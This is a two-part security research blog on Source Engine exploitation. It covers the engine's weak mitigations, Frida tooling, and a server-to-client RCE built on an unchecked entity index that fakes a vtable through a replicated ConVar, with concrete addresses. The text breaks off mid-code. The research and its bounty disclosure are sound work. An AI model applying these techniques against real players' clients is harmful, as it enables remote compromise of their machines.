Reversing Engineering for the Soul

Exploiting the Source Engine (Part 1)

2 August 2018 at 00:00

Introduction

It’s been a long time coming, but here’s my first post on a series about finding and exploiting bugs in Valve Software’s Source Engine. I was first introduced to it through the sandbox game Garry’s Mod in 2010, which introduced me to the field of reverse engineering and paved the way for my favorite hobby, my education, and my eventual employment.

I took a long hiatus from working with the Source Engine when I went to college and got obsessed with playing CTF competitions, a type of competition where participants solve challenges that mimic real-world reverse engineering and exploitation tasks. One day, I saw a post made about a TF2 RCE proof-of-concept released against the engine. To be honest, the bug and the exploit were very simple, and nothing more difficult than some of the intermediate challenges one would find in a good CTF. With that knowledge under my belt, I decided to prove myself and come back to the Source Engine with the goal of finding a true Remote Code Execution (RCE).

As it turns out, this was around the time that Valve released their Bug Bounty program through HackerOne, where they boasted a bounty range of $1,000 - $25,000 for these kinds of bugs. With a bit of luck, I successfully found and wrote a proof-of-concept for a critical Server to Client RCE bug, and was given a generous bounty of $15,000 from Valve. Everything in this series is dedicated to information I’ve learned along the way about the engine.

NOTE: As of writing, the vulnerability has not been publicly disclosed. I will be doing a writeup of the bug and exploit chain if/when it goes public.


Source games Dota 2, CS:GO, and TF2 continue to hold top active player counts on Steam.

The Source Engine

The Source Engine is a third generation derivative of the famous Quake Engine from 1999 and Valve’s own GoldSrc engine (the HL1 engine). The engine itself has been used to create some of the most famous FPS game series in history, including Half-Life, Team Fortress, Portal, and Counter-Strike.

Timeline:

1998 - Valve showcases GoldSrc, a heavily modified Quake engine.
2004 - Valve releases the Source Engine based on GoldSrc.
2007 - The source code to the Source Engine is leaked.
2012 - CS:GO is released, and with it, “Source 1.5” begins development.
2013 - Valve releases the public 2013 SDK for the TF2/CS:S engine containing most of the code necessary to write games for the engine.
2015 - The “Reborn” update for Dota 2 brings the first Source 2 game to market.
2018 - Valve opens their HackerOne program to the public.

The Code:

The first thing that I didn’t truly appreciate about this engine (and other engines in general) is how large it is. The engine is gigantic, featuring millions of lines of C++ code to develop, render, and run games of all types (but mostly first-person games).

The code itself is old and unmaintained. Most of the code was very obviously rushed out to meet deadlines, and honestly it is a huge surprise that the engine even functions at all. This is not unique to Valve, and is very typical in the game development world.

Assets such as models, particles, and maps are all built and run using custom file formats developed by Valve or extended from Quake (yes, file format parsers from 1999). There are still usages of obviously unsafe functions such as strcpy and sprintf, and in general the engine itself has a history of “add, add, add” and very little maintenance.

A lot of the C++ classes included in the engine are straight up dead code. Big features were designed and developed, yet only used for very small parts of the engine. The 2013 SDK tools themselves still have difficulty building valid files for current versions of the engine. Classes derive from anywhere from one to nine or more different base classes, and tend to feature a never-ending maze of abstractions on abstractions. Navigating this codebase is time consuming and generally unpleasant for beginners. All in all, the engine is due for a legacy code rewrite that will likely never happen.

Intro to Source Games:

Source Engine games consist of two separate parts: the engine and the game.

The engine consists of all of the typical game engine features like rendering, networking, the asset loaders for models and materials, and the physics engine. When I refer to the Source Engine, I am referring to this part of the game. The bulk of the engine’s code is found in engine.dll, which is found in the path /bin/engine.dll from the game’s root. This same base code is used in some manner across all SE games, and is typically utilized by 3rd party game developers in its pre-compiled form. The code for the Source Engine was leaked (luckily) as part of the 2007 Valve leak, and this leak is all the code that is available to the public for the engine.

The second part, the game, consists of two main parts, client.dll and server.dll. These binaries contain the compiled game that will use the engine. Both of these dlls will utilize engine.dll heavily in order to function. Inside of client.dll, you will find the code responsible for the GUI subsystem (named VGUI) of the game and the clientside logic of the actual game itself. Inside of server.dll, you will find all of the code to communicate the game’s serverside logic to the remote player’s client.dll. Both of these dlls are found in /[gamedir]/bin/*.dll, where [gamedir] is the game abbreviation (csgo, tf2, etc.).

Both the server and client have shared code that defines the entities of the game and variables that will be synchronized. Shared code is compiled directly into each binary, but some C macro design ensures that only the server parts compile to server.dll, and vice-versa. The engine.dll entity system will synchronize the server’s simulation of the game, and the client’s dll will take these simulations and display them to the player through the engine.dll renderer.

Lastly, a big feature of all Source games that was taken and evolved from the Quake engine is the ConVar system. This system defines a series of variables and commands that are executed on an internal command line, very similar to a cmd.exe or /bin/sh shell. The difference is that, instead of executing new processes, these commands will run functions on either the client or server depending on where it’s run. The engine defines some low-level ConVars found on both the server and client, while the game dlls add more on top of that depending on the game dll that’s running.

A Console Variable (ConVar) takes the form of <name> <value>, where the value can be numerical or string based. Typically used for configuration, certain special ConVars will be synchronized. The server can always request the value of a client’s ConVar. Example: sv_cheats 1 sets the ConVar sv_cheats to 1, which enables cheats.
A Console Command (ConCommand) takes the form of <name> <arg0> <arg1> …, and defines a command with a backing C++ function that can be run from the developer console. Sometimes, it is used by the game or the engine to run remote functions (client -> server, server -> client). Example: changelevel de_dust executes the command changelevel with the argument de_dust, which changes the current map when run on the server console.
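
To make the distinction concrete, here is a toy Python model of such a console. None of this is engine code: the Console class, register_var, register_command, and the stand-in changelevel handler are hypothetical names made up for illustration, and a real ConVar carries flags and typed values that this sketch ignores.

```python
from typing import Callable, Dict, List


class Console:
    """Toy console: variables hold values, commands run a backing function."""

    def __init__(self) -> None:
        self.convars: Dict[str, str] = {}
        self.commands: Dict[str, Callable[[List[str]], str]] = {}

    def register_var(self, name: str, default: str) -> None:
        self.convars[name] = default

    def register_command(self, name: str, fn: Callable[[List[str]], str]) -> None:
        self.commands[name] = fn

    def execute(self, line: str) -> str:
        parts = line.split()
        if not parts:
            return ""
        name, args = parts[0], parts[1:]
        if name in self.commands:
            # ConCommand: <name> <arg0> <arg1> ... calls the backing function.
            return self.commands[name](args)
        if name in self.convars:
            if args:
                # ConVar: <name> <value> stores the new value.
                self.convars[name] = args[0]
            # With or without a new value, report the current one.
            return f"{name} = {self.convars[name]}"
        return f"Unknown command: {name}"


console = Console()
console.register_var("sv_cheats", "0")
console.register_command("changelevel", lambda args: f"changing level to {args[0]}")

print(console.execute("sv_cheats 1"))
print(console.execute("changelevel de_dust"))
```

The single execute entry point is the part worth noticing: both kinds of name share one command line, which is why anything able to feed text to that line can reach every registered variable and function.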

This is just an intro, more on all of this to follow in future posts.

The Bugs:

All of this old code and these custom formats are fantastic for a bug hunter. In 2018, all that’s truly necessary to perform a full chain RCE is a good memory corruption bug to take control and an information leak to bypass ASLR. Typically, the former is the most difficult part of bug hunting in modern software, but later you will see that, for the SE, it is actually the latter.

Here is an overview of the Windows binaries:

32-bit binaries
NX - Enabled
Full ASLR - Enabled (recently)
Stack Cookies - Disabled (in the cases it matters)

If you’re an exploit developer, you would probably find the lack of stack cookies in a game engine with millions of players to be a very shocking discovery. This is a vital shortcoming of the already aging engine, and is essentially unheard of in modern Windows binaries. Valve is well aware of this protection’s existence, and has chosen time and time again not to enable it. I have some speculation as to why this is not enabled (most likely performance or build breaking issues), but regardless, there is a huge point to make: Any controllable stack overflow can overwrite the instruction pointer and divert code execution.

Considering how much the stack is used in this engine, this is a huge benefit to bug hunters. One simple out-of-bounds (OOB) string copy, such as a call to strcpy, will result in swift compromise of the instruction pointer straight into RCE. My first bug, unsurprisingly, is a stack overflow bug, not much different than you would find in a beginner level CTF challenge. But, unlike in a CTF, the implications of a full client machine compromise in a series of games with a huge player base lead to the large payout.
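
Why an unchecked copy reaches the instruction pointer is easy to see in a small simulation. The Python sketch below models a 32-bit stack frame as a byte array; the 16-byte buffer, the frame layout, and every address in it are hypothetical values chosen for illustration, not anything taken from the engine.

```python
import struct

BUF_SIZE = 16              # hypothetical size of a local char buffer
RET_OFFSET = BUF_SIZE + 4  # the return address sits after the saved EBP


def make_frame(return_address: int) -> bytearray:
    """Model a frame, lowest address first: buffer, saved EBP, return address, caller data."""
    return bytearray(BUF_SIZE) + struct.pack("<III", 0x0019FF00, return_address, 0)


def unsafe_copy(frame: bytearray, src: bytes) -> None:
    """Copy src and a NUL terminator to the start of the buffer without a length check."""
    data = src + b"\x00"
    frame[0:len(data)] = data


def saved_return_address(frame: bytearray) -> int:
    return struct.unpack_from("<I", frame, RET_OFFSET)[0]


frame = make_frame(0x10203040)
unsafe_copy(frame, b"de_dust")
print(hex(saved_return_address(frame)))  # unchanged, the string fits in the buffer

payload = b"A" * BUF_SIZE + b"BBBB" + struct.pack("<I", 0x41424344)
unsafe_copy(frame, payload)
print(hex(saved_return_address(frame)))  # replaced by the last four payload bytes
```

A stack cookie would sit between the buffer and the saved EBP and be checked before the function returns, so the second copy would be detected. Without one, nothing stands between the overflow and the return.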

Hunting:

When hunting for these bugs, I chose to take a slightly more difficult path of only performing manual code auditing on the publicly available engine code. What this allows me to do is both search for potentially useful bugs and also learn the engine’s internals along the way. While it might be enticing for me to just fuzz a file format and get lots of crashes, fuzzing tends to find surface level bugs that everyone’s finding, and never those really deep, interesting bugs that no one is finding.

As I said previously, the codebase for this engine is gigantic. You should take advantage of all of the tools available to you when searching. My preferred toolset is this:

Following code structure and searches using Visual Studio with Resharper++.
Cmder (with grep) to search for patterns.
IDA Pro to prove the existence of the bug in the newest build.
WinDbg and x64dbg to attach to the game and try to trigger the bug.
Sourcemod extensions to modify the server for proof-of-concepts

With these tools, my general “process” for bug hunting is this:

Find some section of the client code I feel is exploitable and want to look into more closely
Start reading code. I’ll read for hours until I come across what I think is a possible exploitable bug.
From there, I will open up IDA Pro and locate the function I think is exploitable, then compare its current code with the old, public code I have available.
If it still appears to be exploitable, I will try to find some method to trigger the exploitable function from in-game. This turns out to be one of the hardest parts of the process, because finding a triggerable path to that function is a very difficult task given the size of the engine. Sometimes, the server just can’t trigger the bug remotely. Some familiarity with the engine goes a long way here.
Lastly, I will write Sourcemod plugins that will help me trigger it from a game server to the client, hoping to finally prove the existence of the bug and the exploitability in a proof-of-concept.

Next Time

Next post, I will go more in-depth into the codebase of the Engine and explain the entity and networking system that the Engine utilizes to run the game itself. Also, I will begin introducing some of the techniques I used to write the exploits, including the ASLR and NX bypass. There’s a whole lot more to talk about, and this post barely scratches the surface. At the moment, I’m in the process of working on a new undisclosed bug in the engine. Hoping to turn this one into another big payout. Wish me luck!

— Gbps

Exploiting the Source Engine (Part 2) - Full-Chain Client RCE in Source using Frida
1 May 2021 at 00:00

Introduction

Hey guys, it’s been a while. I have cool new information to share now that my bug bounty has finally gone through. This recent report contained a full server-to-client RCE chain which I’m proud of. Unlike my first submission, it links together two separate bugs to achieve code execution, one memory corruption and one infoleak, and was exploitable in all Source Engine 1 titles including TF2, CS:GO, and L4D:2 (no game specific functionality required!). In this bug hunting adventure, I wanted to spice things up a bit, so I added some extra constraints to the bugs I found/used, as well as experimented using the Frida framework as a way to interface with the engine through TypeScript.

Problems with SourceMod (since the last post)

If you read my last blog post, you know that I was using SourceMod as a way to script up my local dedicated server to test bugs I found for validity. While auditing this time around, it was quickly apparent that most of the obvious bugs in any of the original Source 2013 codebases were patched already. But, without confirming the bugs as fixed myself, I couldn’t rule out their validity, so a lot of my initial time was just spent scripting up SourceMod scripts and testing. While SourceMod itself already has a pretty fleshed-out scripting environment, it still used the SourcePawn language, which is a bit outdated compared to modern scripting languages. In addition, adding any functionality that wasn’t already in SourceMod required you to compile C++ plugins using their plugin API, which was sometimes tedious to work with. While SourceMod was very functional overall, I wanted to find something better. That’s why I decided to try out Frida after hearing good things from friends who worked in the mobile space.

Frida? On Windows?

One of the goals of this bug hunt was to try out Frida for testing PoCs and productizing the exploit. You might have heard about the Frida project before in the mobile hacking community where it really shines, but you might not have heard about it being used for exploiting desktop applications, especially on Windows! (did you know Frida fully supports Windows?)

Getting started with Frida was actually quite simple, because the architecture is simple. In Frida, you have a “client” and a “server”. The “client” (typically Python) selects a process to inject into, in this case hl2.exe, and injects the “server” (known as a Gadget) that will talk back and forth with the “client”. The “server”, executing inside the game, creates a rich Javascript environment with special bindings to read/write memory and hook code. To know more about how this works, check out the Frida Docs.

After getting that simple client and server set up for Frida, I created a Typescript library which allowed me to interface with the Source Engine more easily. Those familiar with game engines know that very often the engine objects take advantage of C++ polymorphism which expose their functionality through virtual functions. So, in order to work with these objects from Frida, I had to write some vtable wrapper helpers that allowed me to convert native pointer values into actual Typescript objects to call functions on.

An example of what these wrappers look like:

// Create a pointer to the IVEngineClient interface by calling CreateInterface exported by engine.dll
let client = IVEngineClient.CreateInterface()
log(`IVEngineClient: ${client.pointer}`)

// Call the vtable function to get the local client's net channel instance
let netchan = client.GetNetChannelInfo() as CNetChan
if (netchan.pointer.isNull()) {
    log(`Couldn't get NetChan.`)
    return;
}

Pretty slick! These wrappers helped me script up low-level C++ functionality with a handy little scripting interface.

The best part of Frida is really its hooking interface, Interceptor. You can hook native functions directly from within Frida, and it handles the entire process of running the Typescript hooks and marshalling arguments to and from the JS engine. This is the primary way you use Frida to introspect, and it worked great for hooking parts of the engine just to see the values of arguments and return values while executing normally.

I quickly learned that the Source engine tooling I had made could also be injected into both a client (hl2.exe) and a server (srcds.exe) at the same time, without any real modification. Therefore, I could write a single PoC that instrumented both the client and server to prove the bug. The server would generate and send some network packets and the client would be hooked to see how it accepted the input. This dual-scripting environment allowed me to instrument practically all of the logic and communication I needed to ensure the prospective bugs I discovered were fully functional and unpatched.

Lastly, I decided to create a fairly novel Frida extension module that utilized the ret-sync project to communicate with a loaded copy of IDA at runtime. What this let me do is assign names to functions inside of my IDA database and have Frida reach out through the ret-sync protocol to my IDA instance to get their address. The intent was to make the exploit scripts much more stable between game binary updates (which happen every few days for games like CS:GO).

Here’s an example of hooking a function by IDA symbol using my ret-sync extension. The script dynamically asks my IDA instance where CGameClient::ProcessSignonStateMsg exists inside engine.dll in the current process, hooks it, and then does some functionality with some engine objects:

// Hook when new clients are connecting and wait for them to spawn in to begin exploiting them. 
// This function is called every time a client transitions from one state to the next 
//     while loading into the server.
let signonstate_fn = se.util.require_symbol("CGameClient::ProcessSignonStateMsg")
Interceptor.attach(signonstate_fn, {
    onEnter(args) {
        console.log("Signon state: " + args[0].toInt32())

        // Check to make sure they're fully spawned in
        let stateNumber = args[0].toInt32()
        if (stateNumber != SIGNONSTATE_FULL) { return; }

        // Give their client a bit of time to load in, if it's slow.
        Thread.sleep(1)

        // Get the CGameClient instance, then get their netchannel
        let thisptr = (this.context as Ia32CpuContext).ecx;
        let asNetChan = new CGameClient(thisptr.add(0x4)).GetNetChannel() as CNetChan;
        if (asNetChan.pointer.isNull()) {
            console.log("[!] Could not get CNetChan for player!")
            return;
        }
        [...]
    }
})

Now, if the game updates, this script will still function so long as I have an IDA database for engine.dll open with CGameClient::ProcessSignonStateMsg named inside of it. The named symbols can be ported over between engine updates using BinDiff automagically, making it easy to automatically port offsets as the game updates!

All in all, my experience with Frida was awesome and its extensibility was wonderful. I plan to use Frida for all sorts of exploitation and VR activities to follow, and will continue to use it with any more Source adventures in the foreseeable future. I encourage readers with backgrounds with pwntools and CTFing to consider trying out Frida against desktop binaries. I gained a lot from learning it, and I feel like the desktop reversing/VR/exploitation community should really look to adopt it as much as the mobile community has!

Okay, enough about Frida. Talk about Source bugs!

There’s a lot of bugs in Source. It’s a very buggy engine. But not all bugs are made equal, and only some bugs are worth attempting to chain together. The easy type of bug to exploit in the engine is the basic stack-based buffer overflow. If you read my last blog post, you saw that Source typically compiles without any stack protections against buffer overflows. Therefore, it’s trivial to gain control of the instruction pointer and begin ROP-ing for as long as you have a silly string bug affecting the stack.

In CS:GO, the classic method of exploiting these types of bugs is to exploit some buffer overflow, build a ROP chain using the module xinput.dll, which has ASLR marked as disabled, and execute shellcode on that alone. In Windows, DLLs can essentially mark themselves as not being subject to ASLR. Typically you will only find this on DLLs compiled with ancient versions of the MSVC compiler toolchain, which I believe is the case with xinput.dll. This doesn’t mean that the module cannot be relocated to a new address. In fact, xinput.dll can actually be relocated to other addresses just fine, and sometimes can be found at different addresses depending on whether another module’s load conflicts with the address xinput.dll asks to be loaded at. Basically this means that, due to the way xinput.dll asks to be loaded, the system will choose not to randomize its base address, making it inherently defeat ASLR as you always know generally where xinput.dll is going to be found in your victim’s memory. You can write one static ROP chain and use it unmodified on every client you wish to exploit.

In addition, since xinput.dll is always loaded into the games which use it, it is by far the easiest form of ASLR defeat in the engine. Valve doesn’t seem too concerned by this, as it’s been exploited over and over again over the years. Surprisingly though, in TF2, there is no xinput.dll to utilize for ASLR defeat. This actually makes TF2, which runs on the older Source engine version, significantly harder to exploit than CS:GO, their flagship game, because TF2 requires a pointer leak to defeat ASLR. Not a great design choice I feel.
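
On Windows, whether a module opts into ASLR is recorded as the DYNAMIC_BASE bit (0x0040) of the DllCharacteristics field in its PE optional header. The Python sketch below reads that bit from raw file bytes. The helper names opts_into_aslr and fake_pe are made up for this example, and fake_pe only builds a synthetic header blob for demonstration; it is not a loadable DLL and says nothing about what any real module contains.

```python
import struct

IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040


def opts_into_aslr(pe: bytes) -> bool:
    """Return True if the PE image sets the DYNAMIC_BASE bit in DllCharacteristics."""
    if pe[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    optional_header = e_lfanew + 4 + 20  # skip the signature and IMAGE_FILE_HEADER
    # DllCharacteristics is at offset 70 of the optional header in both PE32 and PE32+.
    (characteristics,) = struct.unpack_from("<H", pe, optional_header + 70)
    return bool(characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)


def fake_pe(characteristics: int) -> bytes:
    """Build a minimal synthetic header blob (hypothetical test data only)."""
    image = bytearray(0x200)
    image[0:2] = b"MZ"
    struct.pack_into("<I", image, 0x3C, 0x80)
    image[0x80:0x84] = b"PE\x00\x00"
    struct.pack_into("<H", image, 0x80 + 24 + 70, characteristics)
    return bytes(image)


print(opts_into_aslr(fake_pe(0x0140)))  # DYNAMIC_BASE | NX_COMPAT
print(opts_into_aslr(fake_pe(0x0100)))  # NX_COMPAT only
```

To check a module on disk you would pass the file contents instead, for example the result of open(path, "rb").read() for whichever DLL you are curious about.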

In the case of a server->client exploit, one of these exploits would typically look like:

Client connects to server
Server exploits stack-based buffer overflow in the client
Bug overwrites the stack with a ROP chain written against xinput and overwrites into the instruction pointer (no stack cookie)
Client begins executing gadgets inside of xinput to set up a call to ShellExecuteA or VirtualAlloc/VirtualProtect.
Client is running arbitrary code

If this reminds you of early 2000s era exploitation, you are correct. This is generally the level of difficulty one would find in entry level exploitation problems in CTF.

What if my target doesn’t have xinput.dll to defeat ASLR?

One would think: “Well, the engine is buggy already, that means that you can just find another infoleak bug and be done!” But it doesn’t quite work that way in practice. As others who participate in the program have found, finding an information leak is actually quite difficult. This is just due to the general architecture of the networking of the engine, which rarely relies on any kind of buffer copy operations. Packets in the engine are very small and don’t often have length values that are controlled by the other side of the connection. In addition, most larger buffers are allocated on the heap instead of the stack. Source uses a custom heap allocator, as most game engines do, and all heap allocations are implicitly zeroed before being given back to the caller, unlike your typical system malloc implementation. Any uninitialized heap memory is unfortunately not a valid target for an infoleak.

One option for getting around this information leak constraint is to focus on finding bugs which allow you to leverage the corruption itself to leak information. This is generally the path I would suggest for anyone looking to exploit the engine in games without xinput.dll, as finding the typical vanilla infoleak is much more difficult than finding good corruption and exploiting that alone to leak information.

Types of bugs that tend to be good for this kind of “all-in-one” corruption are:

Arbitrary relative pointer writes to pointers in global queryable objects
Heap overflows against a queryable object to cause controllable pointer writes
Use-after-free with a queryable object

Heap exploits are cool to write, but often their stability can be difficult to achieve due to the vast number of heap allocations happening at any given time. This makes carving out areas of heap memory for your exploit require careful consideration for specifically sized holes of memory and the timing at which these holes are made. This process is lovingly referred to as Heap Feng Shui. In this post, I do not go over how to exploit heap vulnerabilities on the Source engine, but I will note that, due to its custom allocator, the allocations are much more predictable than the default Windows 10 heap, which is a nice benefit for those looking to do heap corruption.

Also, notice the word queryable above. This means that, whatever you corrupt for your information leak, you need to ensure that it can be queried over the network. Very few types of game objects can be queried arbitrarily. The best type of queryable object to work with in Source is the ConVar object, which represents a configurable console variable. Both the client and server can send requests to query the value of any ConVar object. The string that is sent back is either the integer value of the ConVar or an arbitrary-length string value.

Bug Hunting - Struggling is fun!

This time around, I gave myself a few constraints to make the exploit process a bit more challenging, and therefore more fun:

The exploit must be memory corruption and must not be a trivial stack-based buffer overflow
The exploit must produce its own pointer leak, or chain another bug to infoleak
The exploit must work in all Source 1 games (TF2, CS:GO, L4D:2, etc.) and not require any special configuration of the client
The exploit must have a ~100% stability rate
The exploit must be written using Frida, and must be “one-click” automatically exploited on any client connected to the server

Given these constraints, I ruled out quite a few bugs. Most of these were because they were trivial stack-based buffer overflows, or present in only one game but not the others.

Here’s what I eventually settled on for my chain:

Memory Corruption - An array index under/overflow that allowed for one-shot arbitrary execute of an address in the low-level networking code
Information Leak - A stack-based information leak in file transfers that leveraged a “bug” in the ZIP file parser for the map file format (BSP)

I would say the general length of time to discover the memory corruption was about 1/10th of the time I spent finding the information leak. I spent around two months auditing code for information leaks, whereas the memory corruption bug became quickly obvious within a few days of auditing the networking code.

Memory Corruption - Arbitrary execute with CL_CopyExistingEntity

The vulnerability I used for memory corruption was the array index over/under-flow in the low-level networking function CL_CopyExistingEntity. This is a function called within the packet handler for the server->client packet named SVC_PacketEntities. In Source, the way data about changes to game objects is communicated is through the “delta” system. The server calculates what values have changed about an entity between two points in time and sends that information to your client in the form of a “delta”. This function is responsible for copying any changed variables of an existing game object from the network packet received from the server into the values stored on the client. I would consider this a very core part of the Source networking, which means that it exists across the board for all Source games. I have not verified it exists in older GoldSrc games, but I would not be surprised, considering this code and vulnerability are ancient and have existed for 15+ years untouched.
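
As a rough mental model of the delta idea, consider the Python sketch below. It is a deliberate simplification: the Snapshot type, make_delta, apply_delta, and the field names are all hypothetical, and entity state is reduced to a flat dictionary of integers.

```python
from typing import Dict

Snapshot = Dict[str, int]


def make_delta(old: Snapshot, new: Snapshot) -> Snapshot:
    """Server side: keep only the fields whose value changed between two snapshots."""
    return {key: value for key, value in new.items() if old.get(key) != value}


def apply_delta(state: Snapshot, delta: Snapshot) -> Snapshot:
    """Client side: copy the changed fields over the client's existing copy."""
    updated = dict(state)
    updated.update(delta)
    return updated


tick_1 = {"health": 100, "x": 10, "y": 20}
tick_2 = {"health": 75, "x": 10, "y": 24}

delta = make_delta(tick_1, tick_2)
print(delta)
print(apply_delta(tick_1, delta) == tick_2)
```

In this toy model, apply_delta plays the role the post assigns to CL_CopyExistingEntity. The engine itself reads its deltas out of a bit buffer rather than a dictionary.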

The function looks like so:

void CL_CopyExistingEntity( CEntityReadInfo &u )
{
    int start_bit = u.m_pBuf->GetNumBitsRead();

    IClientNetworkable *pEnt = entitylist->GetClientNetworkable( u.m_nNewEntity );
    if ( !pEnt )
    {
        Host_Error( "CL_CopyExistingEntity: missing client entity %d.\n", u.m_nNewEntity );
        return;
    }

    Assert( u.m_pFrom->transmit_entity.Get(u.m_nNewEntity) );

    // Read raw data from the network stream
    pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

u.m_nNewEntity is controlled arbitrarily by the network packet, therefore this first argument to GetClientNetworkable can be an arbitrary 32-bit value. Now let’s look at GetClientNetworkable:

IClientNetworkable* CClientEntityList::GetClientNetworkable( int entnum )
{
	Assert( entnum >= 0 );
	Assert( entnum < MAX_EDICTS );
	return m_EntityCacheInfo[entnum].m_pNetworkable;
}

As we see here, these Assert statements would typically check that this value is sane, and crash the game if it isn’t. But this is not what happens in practice. In release builds of the game, Assert statements are compiled out entirely. This is for performance reasons, as the #1 goal of any game engine programmer is speed first, everything else second.

Anyway, these Assert statements do not prevent us from controlling entnum arbitrarily. m_EntityCacheInfo exists inside of a globally defined structure entitylist inside of client.dll. This object holds the client’s central store of all data related to game entities. Since m_EntityCacheInfo is at a static global offset, we can locate that offset in any given version of client.dll and calculate the value of entnum that produces our target pointer.

Here is what an object inside of m_EntityCacheInfo looks like:

// Cached info for networked entities.
// NOTE: Changing this changes the interface between engine & client
struct EntityCacheInfo_t
{
	// Cached off because GetClientNetworkable is called a *lot*
	IClientNetworkable *m_pNetworkable;
	unsigned short m_BaseEntitiesIndex;	// Index into m_BaseEntities (or m_BaseEntities.InvalidIndex() if none).
	unsigned short m_bDormant;	// cached dormant state - this is only a bit
};

All together, this vulnerability allows us to return an arbitrary IClientNetworkable* from GetClientNetworkable, as long as the slot it is read from sits at a multiple of 8 bytes from the start of the array (as sizeof(EntityCacheInfo_t) == 8). This is important when choosing targets to chain with later.
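
The 8 byte stride can be checked with a quick Python sketch that mirrors the 32-bit struct layout using ctypes. The class name EntityCacheInfo32 and the array base address are assumptions made for illustration; the pointer member is modeled as a 4-byte integer because the game binaries are 32-bit.

```python
import ctypes


class EntityCacheInfo32(ctypes.Structure):
    """32-bit layout of EntityCacheInfo_t, with the pointer modeled as a 4-byte integer."""
    _fields_ = [
        ("m_pNetworkable", ctypes.c_uint32),
        ("m_BaseEntitiesIndex", ctypes.c_uint16),
        ("m_bDormant", ctypes.c_uint16),
    ]


STRIDE = ctypes.sizeof(EntityCacheInfo32)


def slot_address(array_base: int, entnum: int) -> int:
    """Address read by m_EntityCacheInfo[entnum].m_pNetworkable, wrapped to 32 bits."""
    return (array_base + entnum * STRIDE) & 0xFFFFFFFF


ARRAY_BASE = 0x10C00000  # hypothetical address of m_EntityCacheInfo[0]

print(STRIDE)
print(hex(slot_address(ARRAY_BASE, 5)))       # in bounds
print(hex(slot_address(ARRAY_BASE, -3)))      # underflow: below the array
print(hex(slot_address(ARRAY_BASE, 100000)))  # overflow: far past the array
```

Because entnum is a signed int with no bounds check in release builds, both directions are reachable, but only in steps of STRIDE bytes from the array base.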

Lastly, the result of returning an arbitrary IClientNetworkable* is that there is immediately this function call on our controlled pEnt pointer:

pEnt->PreDataUpdate( DATA_UPDATE_DATATABLE_CHANGED );

This is a virtual function call. This means that the generated code will offset into pEnt’s vtable and call a function. This looks like so in IDA:

Notice call dword ptr [eax+24]. This implies that the vtable index is at 24 / 4 = 6, which is also important to know for future exploitation.

And that’s it, we have our first bug. This will allow us to control, within reason, the location of a fake object in the client to later craft into an arbitrary execute. But how are we going to create a fake object at a known location such that we can convince CL_CopyExistingEntity to call the address of our choice? Well, we can take advantage of the fact that the server can set any arbitrary value to a ConVar on a client, and most ConVar objects exist in globals defined inside of client.dll.

The definition of ConVar is:

class ConVar : public ConCommandBase, public IConVar

Where the general structure of a ConVar looks like:

ConCommandBase *m_pNext; [0x00]
bool m_bRegistered; [0x04]
const char *m_pszName; [0x08]
const char *m_pszHelpString; [0x0C]
int m_nFlags; [0x10]
ConVar *m_pParent; [0x14]
const char *m_pszDefaultValue; [0x18]
char *m_pszString; [0x1C]

In this bug, we’re targeting m_pszString so that our crafted pointer lands directly on m_pszString. When the bug calls our function, it will believe that &m_pszString is the location of the object’s pointer, and m_pszString will contain its vtable pointer. The engine will now believe that any value inside of m_pszString for the ConVar will be part of the object’s structure. Then, it will call a function pointer at *((*m_pszString)+0x18), which is vtable index 6 at 4 bytes per entry. As long as the ConVar on the client is marked as FCVAR_REPLICATED, the server can set its value arbitrarily, giving us full control over the contents of m_pszString. If we point the vtable pointer to the right place, this will give us control over the instruction pointer!

m_pszString is at offset 0x1C in the above ConVar structure, but the terms of our vulnerability require that this pointer be aligned to an 8 byte boundary. Therefore, we need to find a suitable candidate ConVar that is both globally defined and replicated, and whose m_pszString is aligned correctly for GetClientNetworkable to return it.

This can be seen by what GetClientNetworkable looks like in x64dbg:

In the above, the pointer we can return is controlled as such:

ecx+eax*8+28 where ecx is entitylist, eax is controlled by us

With a bit of searching, I found that the ConVar sv_mumble_positionalaudio exists in client.dll and is replicated. Here it exists at 0x10C6B788 in client.dll:

This means to calculate the location of m_pszString, we add 0x1C to get 0x10C6B788 + 0x1C = 0x10C6B7A4. In this build, entitylist is at an aligned offset of 4 (0xC580B4). So, now we can calculate if this candidate is aligned properly:

>>> 0x10c6b7a4 % 0x8
4

This might look wrong, but entitylist is actually aligned to a 0x04 boundary, so that will add an extra 0x04 to the above alignment, making this value successfully align to 0x08!
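The alignment argument can also be checked mechanically. The following is a minimal sketch, assuming the slot address has the form entitylist + index*8 + 0x28 (reading the x64dbg displacement as hexadecimal) and that the module base is at least 8-byte aligned, so module offsets and absolute addresses can be compared modulo 8. The helper `slot_is_reachable` is a hypothetical name used for illustration and is not part of the PoC.

```python
ENTRY_STRIDE = 8          # slots are 8 bytes apart (the eax*8 in the lookup)
SLOT_DISPLACEMENT = 0x28  # assumption: the "+28" displayed by x64dbg is hexadecimal


def slot_is_reachable(target: int, entitylist: int) -> bool:
    """Return True if some integer index satisfies
    entitylist + index * 8 + 0x28 == target."""
    return (target - entitylist - SLOT_DISPLACEMENT) % ENTRY_STRIDE == 0


CONVAR_ADDRESS = 0x10C6B788            # sv_mumble_positionalaudio in this build
M_PSZSTRING = CONVAR_ADDRESS + 0x1C    # location of the m_pszString member
ENTITYLIST_OFFSET = 0xC580B4           # entitylist offset quoted in the text

print(hex(M_PSZSTRING))                          # 0x10c6b7a4
print(M_PSZSTRING % 8, ENTITYLIST_OFFSET % 8)    # both leave remainder 4
print(slot_is_reachable(M_PSZSTRING, ENTITYLIST_OFFSET))
```

Both values leave the same remainder modulo 8, which is why a candidate that looks misaligned on its own is still reachable from the entity list.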

Now we’re good to go ahead and use the m_pszString value of sv_mumble_positionalaudio to fake our object’s vtable pointer by using the server to control the string data contents through ConVar replication.

In summary, this is the path the code above will take:

Call GetClientNetworkable to get pEnt, which we will fake to point to &m_pszString.
The code dereferences the first value inside of m_pszString to get the pointer to the vtable
The code offsets the vtable to index 6 and calls the first function there. We need to make sure we point this to a place we control, otherwise we would only be controlling the vtable pointer and not the actual function address in the table.

But where are we going to point the vtable? Well, we don’t need much, just a location of a known place the server can control so we can write an address we want to execute. I did some searching and came across this:

bool NET_Tick::ReadFromBuffer( bf_read &buffer )
{
	VPROF( "NET_Tick::ReadFromBuffer" );

